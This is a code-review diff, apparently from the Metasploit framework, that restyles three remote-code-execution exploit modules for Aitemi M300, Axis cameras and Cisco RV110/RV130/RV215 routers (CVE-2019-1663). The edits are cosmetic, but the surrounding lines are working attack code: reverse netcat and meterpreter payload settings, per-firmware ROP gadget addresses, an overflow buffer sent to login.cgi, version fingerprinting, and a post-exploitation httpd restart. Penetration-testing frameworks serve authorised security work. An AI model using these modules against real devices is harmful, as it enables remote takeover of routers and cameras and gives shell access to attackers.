zeroSteiner
diff --git a/‎modules/exploits/linux/http/aitemi_m300_time_rce.rb‎
Lines changed: 1 addition & 1 deletion b/‎modules/exploits/linux/http/aitemi_m300_time_rce.rb‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/exploits/linux/http/axis_srv_parhand_rce.rb‎
Lines changed: 22 additions & 18 deletions b/‎modules/exploits/linux/http/axis_srv_parhand_rce.rb‎
Lines changed: 22 additions & 18 deletions
diff --git a/‎modules/exploits/linux/http/cve_2019_1663_cisco_rmi_rce.rb‎
Lines changed: 77 additions & 79 deletions b/‎modules/exploits/linux/http/cve_2019_1663_cisco_rmi_rce.rb‎
Lines changed: 77 additions & 79 deletions
@@ -32,7 +32,7 @@ def initialize(info = {})
           ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],
           ['CVE', '2025-34152']
         ],
-        'Platform' => %w(linux unix),
+        'Platform' => %w[linux unix],
         'Payload' => {
           'BadChars' => "\x60"
         },
 
@@ -43,28 +43,32 @@ def initialize(info = {})
         'Targets' => [
           [
             'Unix In-Memory',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_memory,
-            'Payload' => {
-              'BadChars' => ' ',
-              'Encoder' => 'cmd/ifs',
-              'Compat' => {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'netcat-e'
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'Payload' => {
+                'BadChars' => ' ',
+                'Encoder' => 'cmd/ifs',
+                'Compat' => {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'netcat-e'
+                }
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
               }
-            },
-            'DefaultOptions' => {
-              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
             }
           ],
           [
             'Linux Dropper',
-            'Platform' => 'linux',
-            'Arch' => ARCH_ARMLE,
-            'Type' => :linux_dropper,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_ARMLE,
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
             }
           ]
         ],
@@ -101,7 +105,7 @@ def exploit
     end
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     send_request_cgi(
       'method' => 'POST',
       'uri' => "/index.html/#{rand_srv}",
 
@@ -54,7 +54,7 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Platform' => %w[linux],
         'SessionTypes' => %w[meterpreter],
-        'CmdStagerFlavor' => %w{wget},
+        'CmdStagerFlavor' => %w[wget],
         'Privileged' => true, # BusyBox
         'References' => [
           ['CVE', '2019-1663'],
@@ -67,7 +67,7 @@ def initialize(info = {})
           'SSL' => true,
           'RPORT' => 443,
           'CMDSTAGER::FLAVOR' => 'wget',
-          'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+          'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
         },
         'Targets' => [
           [
@@ -82,7 +82,7 @@ def initialize(info = {})
               'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -98,7 +98,7 @@ def initialize(info = {})
               'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -114,7 +114,7 @@ def initialize(info = {})
               'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -130,7 +130,7 @@ def initialize(info = {})
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -146,7 +146,7 @@ def initialize(info = {})
               'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -160,7 +160,7 @@ def initialize(info = {})
               'gadget2' => 0x00041308, # mov r0, sp; blx r2;
               'Arch' => ARCH_ARMLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
               }
             },
           ],
@@ -176,7 +176,7 @@ def initialize(info = {})
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -192,7 +192,7 @@ def initialize(info = {})
               'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -208,7 +208,7 @@ def initialize(info = {})
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -224,7 +224,7 @@ def initialize(info = {})
               'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -240,7 +240,7 @@ def initialize(info = {})
               'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -256,7 +256,7 @@ def initialize(info = {})
               'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
               'Arch' => ARCH_MIPSLE,
               'DefaultOptions' => {
-                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
               }
             }
           ],
@@ -266,7 +266,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_DOWN, ],
           'Reliability' => UNKNOWN_RELIABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         },
         'Compat' => {
           'Meterpreter' => {
@@ -315,25 +315,23 @@ def prepare_shellcode(cmd)
   end
 
   def send_request(buffer)
-    begin
-      send_request_cgi({
-        'uri' => '/login.cgi',
-        'method' => 'POST',
-        'vars_post' => {
-          submit_button: "login",
-          submit_type: "",
-          gui_action: "",
-          wait_time: 0,
-          change_action: "",
-          enc: 1,
-          user: rand_text_alpha_lower(5),
-          pwd: buffer,
-          sel_lang: "EN"
-        }
-      })
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
-    end
+    send_request_cgi({
+      'uri' => '/login.cgi',
+      'method' => 'POST',
+      'vars_post' => {
+        submit_button: 'login',
+        submit_type: '',
+        gui_action: '',
+        wait_time: 0,
+        change_action: '',
+        enc: 1,
+        user: rand_text_alpha_lower(5),
+        pwd: buffer,
+        sel_lang: 'EN'
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
   end
 
   def check
@@ -343,57 +341,57 @@ def check
     # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
 
     fingerprints = {
-      "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
-        "version" => "Cisco RV110W 1.1.0.9",
-        "status" => Exploit::CheckCode::Vulnerable
+      '69d906ddd59eb6755a7b9c4f46ea11cdaa47c706' => {
+        'version' => 'Cisco RV110W 1.1.0.9',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
-        "version" => "Cisco RV110W 1.2.0.9",
-        "status" => Exploit::CheckCode::Vulnerable
+      '8d3b677d870425198f7fae94d6cfe262551aa8bd' => {
+        'version' => 'Cisco RV110W 1.2.0.9',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "134ee643ec877641030211193a43cc5e93c96a06" => {
-        "version" => "Cisco RV110W 1.2.0.10",
-        "status" => Exploit::CheckCode::Vulnerable
+      '134ee643ec877641030211193a43cc5e93c96a06' => {
+        'version' => 'Cisco RV110W 1.2.0.10',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
-        "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      'e3b2ec9d099a3e3468f8437e5247723643ff830e' => {
+        'version' => 'Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       },
-      "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
-        "version" => "Cisco RV130/RV130W 1.0.0.21",
-        "status" => Exploit::CheckCode::Vulnerable
+      '6b7b1e8097e8dda26db27a09b8176b9c32b349b3' => {
+        'version' => 'Cisco RV130/RV130W 1.0.0.21',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "9b1a87b752d11c5ba97dd80d6bae415532615266" => {
-        "version" => "Cisco RV130/RV130W 1.0.1.3",
-        "status" => Exploit::CheckCode::Vulnerable
+      '9b1a87b752d11c5ba97dd80d6bae415532615266' => {
+        'version' => 'Cisco RV130/RV130W 1.0.1.3',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "9b6399842ef69cf94409b65c4c61017c862b9d09" => {
-        "version" => "Cisco RV130/RV130W 1.0.2.7",
-        "status" => Exploit::CheckCode::Vulnerable
+      '9b6399842ef69cf94409b65c4c61017c862b9d09' => {
+        'version' => 'Cisco RV130/RV130W 1.0.2.7',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
-        "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
-        "status" => Exploit::CheckCode::Vulnerable
+      '8680ec6df4f8937acd3505a4dd36d40cb02c2bd6' => {
+        'version' => 'Cisco RV130/RV130W 1.0.3.14, 1.0.3.16',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "8c8e05de96810a02344d96588c09b21c491ede2d" => {
-        "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      '8c8e05de96810a02344d96588c09b21c491ede2d' => {
+        'version' => 'Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       },
-      "2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
-        "version" => "Cisco RV215W 1.1.0.5",
-        "status" => Exploit::CheckCode::Vulnerable
+      '2f29a0dfa78063d643eb17388e27d3f804ff6765' => {
+        'version' => 'Cisco RV215W 1.1.0.5',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
-        "version" => "Cisco RV215W 1.1.0.6",
-        "status" => Exploit::CheckCode::Vulnerable
+      'e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f' => {
+        'version' => 'Cisco RV215W 1.1.0.6',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
-        "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
-        "status" => Exploit::CheckCode::Vulnerable
+      '7cc8fcce5949a68c31641c38255e7f6ed31ff4db' => {
+        'version' => 'Cisco RV215W 1.2.0.14 or 1.2.0.15',
+        'status' => Exploit::CheckCode::Vulnerable
       },
-      "050d47ea944eaeadaec08945741e8e380f796741" => {
-        "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
-        "status" => Exploit::CheckCode::Unknown
+      '050d47ea944eaeadaec08945741e8e380f796741' => {
+        'version' => 'Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)',
+        'status' => Exploit::CheckCode::Unknown
       }
     }
 
@@ -403,10 +401,10 @@ def check
       'uri' => normalize_uri(uri, 'lang_pack/EN.js')
     })
     if res && res.code == 200
-      fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
+      fingerprint = Digest::SHA1.hexdigest("#{res.body}")
       if fingerprints.key?(fingerprint)
-        print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
-        return fingerprints[fingerprint]["status"]
+        print_good("Successfully identified device: #{fingerprints[fingerprint]['version']}")
+        return fingerprints[fingerprint]['status']
       else
         print_status("Couldn't reliably fingerprint the target.")
       end
@@ -419,7 +417,7 @@ def exploit
     execute_cmdstager
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     shellcode = prepare_shellcode(cmd.to_s)
     send_request(shellcode)
   end
@@ -428,8 +426,8 @@ def on_new_session(session)
     # Given there is no process continuation here, the httpd server will stop
     # functioning properly and we need to take care of proper restart
     # ourselves.
-    print_status("Reloading httpd service")
-    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    print_status('Reloading httpd service')
+    reload_httpd_service = 'killall httpd && cd /www && httpd && httpd -S'
     if session.type.to_s.eql? 'meterpreter'
       session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
       session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""